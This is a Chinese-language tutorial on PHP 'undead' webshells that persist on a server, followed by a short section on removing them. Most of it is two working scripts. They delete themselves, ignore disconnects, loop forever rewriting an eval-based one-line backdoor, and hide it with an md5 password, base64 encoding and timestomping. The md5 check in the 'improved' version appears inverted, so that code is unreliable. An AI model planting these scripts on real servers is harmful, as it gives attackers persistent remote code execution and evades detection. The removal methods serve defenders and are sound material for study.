内存马原理
PHP内存马即PHP不死马,简单来说就是会写进PHP进程里,无限在指定目录中生成木马文件
生成过程
不死马.php → 上传到server → server执行文件 → server本地循环不断生成一句话木马
不死马
初代
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
file_put_contents($file,$code);
system('touch -m -d "2021-8-11 12:45:00" . 2.php');
usleep(5000);
}
?>
-
ignore_user_abort(true);
函数设置与客户机断开是否会终止脚本的执行。这里设置为true则忽略与用户的断开,即使与客户机断开脚本仍会执行。 -
set_time_limit()
函数限制脚本的执行时间(如设置5则需在5秒内执行完)。这里设置为0是指没有时间限制。 -
unlink(FILE)
删除文件本身,以起到隐蔽自身的作用。 -
while
循环内每隔usleep(5000)即写新的后门文件 -
system()
执行的命令用于修改文件的创建或修改时间,touch新建一个不存在的文件,-m仅修改时间,-d使用想要修改的时间而不是当时的时间,可以绕过“find –name ‘*.php’ –mmin -10”命令检测最近10分钟修改或新创建的PHP文件,但不一定有用,可选。 -
md5算是混淆,也是防止直接被别人利用
这里while 里面只是并没有判断了这个文件是不是存在,那么我只需要把这个文件中的 shell 注释掉就可以绕过这个内存木马了。
修改后
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = 'c.php';
$code = base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY10pOz8+');
while(true) {
if(md5(file_get_contents($file))===md5($code)) {
file_put_contents($file, $code);
}
usleep(50);
}
?>
对加密的一句话木马进行解密,可防止通过命令搜索,while中md5加密后直接执行一句话木马的编写。
查杀方法
1.重启服务
众所周知,重启能解决90%的问题,内存马也是存在于进程之中,所以条件允许的话直接重启服务便是了
2.占用目录名
删除并重新创建一个和不死马要生成的马名字一样的路径及文件
3.kill
ps aux 列出所有进程,找到要杀掉的进程运用命令
kill -9 -1 ___ 9:杀死一个进程 1:重新加载进程
4.竞争删除一句话木马
编写一个使用ignore_user_abort(true)函数的脚本,一直竞争写入删除不死马文件,其中usleep()的时间必须要小于不死马的usleep()时间才会有效果
<?php
ignore_user_abort(true);
set_time_limit(0);
while (1) {
$pid = 不死马的进程PID;
@unlink(".1.php");
exec("kill -9 $pid");
usleep(1000);
}
?>
|